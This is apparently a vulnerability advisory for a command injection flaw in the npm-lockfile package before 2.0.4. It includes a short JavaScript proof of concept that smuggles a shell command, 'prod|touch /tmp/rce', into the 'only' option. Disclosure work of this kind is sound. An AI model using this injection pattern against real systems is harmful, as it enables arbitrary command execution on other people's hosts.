npm-lockfile before 2.0.4 does not sanitize unsafe external input and invokes a sensitive command-execution API with that input, causing a command injection vulnerability.
```javascript
// npm i [email protected]
const getLockfile = require('npm-lockfile/getLockfile');

// The "only" option is passed unsanitized into a shell command; the shell
// metacharacter "|" lets the attacker-controlled suffix run as its own command.
getLockfile("./package-lock.json", "08/01/2022", { "only": "prod|touch /tmp/rce" }); // a file named rce will be created at /tmp
```
This vulnerability allows execution of arbitrary commands on the host operating system.